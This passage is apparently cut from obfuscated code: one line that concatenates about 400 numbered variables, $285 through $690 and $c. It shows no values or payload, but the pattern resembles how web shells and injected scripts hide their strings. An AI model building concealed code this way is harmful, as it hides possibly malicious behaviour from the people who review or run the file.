$285+$286+$287+$288+$289+$290+$291+$292+$293+$294+$295+$296+$297+$298+$299+$300+$301+$302+$303+$304+$305+$306+$307+$308+$309+$310+$311+$312+$313+$314+$315+$316+$317+$318+$319+$320+$321+$322+$323+$324+$325+$326+$327+$328+$329+$330+$331+$332+$333+$334+$335+$336+$337+$338+$339+$340+$341+$342+$343+$344+$345+$346+$347+$348+$349+$350+$351+$352+$353+$354+$355+$356+$357+$358+$359+$360+$361+$362+$363+$364+$365+$366+$367+$368+$369+$370+$371+$372+$373+$374+$375+$376+$377+$378+$379+$380+$381+$382+$383+$384+$385+$386+$387+$388+$389+$390+$391+$392+$393+$394+$395+$396+$397+$398+$399+$400+$401+$402+$403+$404+$405+$406+$407+$408+$409+$410+$411+$412+$413+$414+$415+$416+$417+$418+$419+$420+$421+$422+$423+$424+$425+$426+$427+$428+$429+$430+$431+$432+$433+$434+$435+$436+$437+$438+$439+$440+$441+$442+$443+$444+$445+$446+$447+$448+$449+$450+$451+$452+$453+$454+$455+$456+$457+$458+$459+$460+$461+$462+$463+$464+$465+$466+$467+$468+$469+$470+$471+$472+$473+$474+$475+$476+$477+$478+$479+$480+$481+$482+$483+$484+$485+$486+$487+$488+$489+$490+$491+$492+$493+$494+$495+$496+$497+$498+$499+$500+$501+$502+$503+$504+$505+$506+$507+$508+$509+$510+$511+$512+$513+$514+$515+$516+$517+$518+$519+$520+$521+$522+$523+$524+$525+$526+$527+$528+$529+$530+$531+$532+$533+$534+$535+$536+$537+$538+$539+$540+$541+$542+$543+$544+$545+$546+$547+$548+$549+$550+$551+$552+$553+$554+$555+$556+$557+$558+$559+$560+$561+$562+$563+$564+$565+$566+$567+$568+$569+$570+$571+$572+$573+$574+$575+$576+$577+$578+$579+$580+$581+$582+$583+$584+$585+$586+$587+$588+$589+$590+$591+$592+$593+$594+$595+$596+$597+$598+$599+$600+$601+$602+$603+$604+$605+$606+$607+$608+$609+$610+$611+$612+$613+$614+$615+$616+$617+$618+$619+$620+$621+$622+$623+$624+$625+$626+$627+$628+$629+$630+$631+$632+$633+$634+$635+$636+$637+$638+$639+$640+$641+$642+$643+$644+$645+$646+$647+$648+$649+$650+$651+$652+$653+$654+$655+$656+$657+$658+$659+$660+$661+$662+$663+$664+$665+$666+$667+$668+$669+$670+$671+$672+$673+$674+$675+$676+$677+$678+$679+$680+$681+$682+$683+$684+$685+$686+$687+$688+$689+$690+$c);
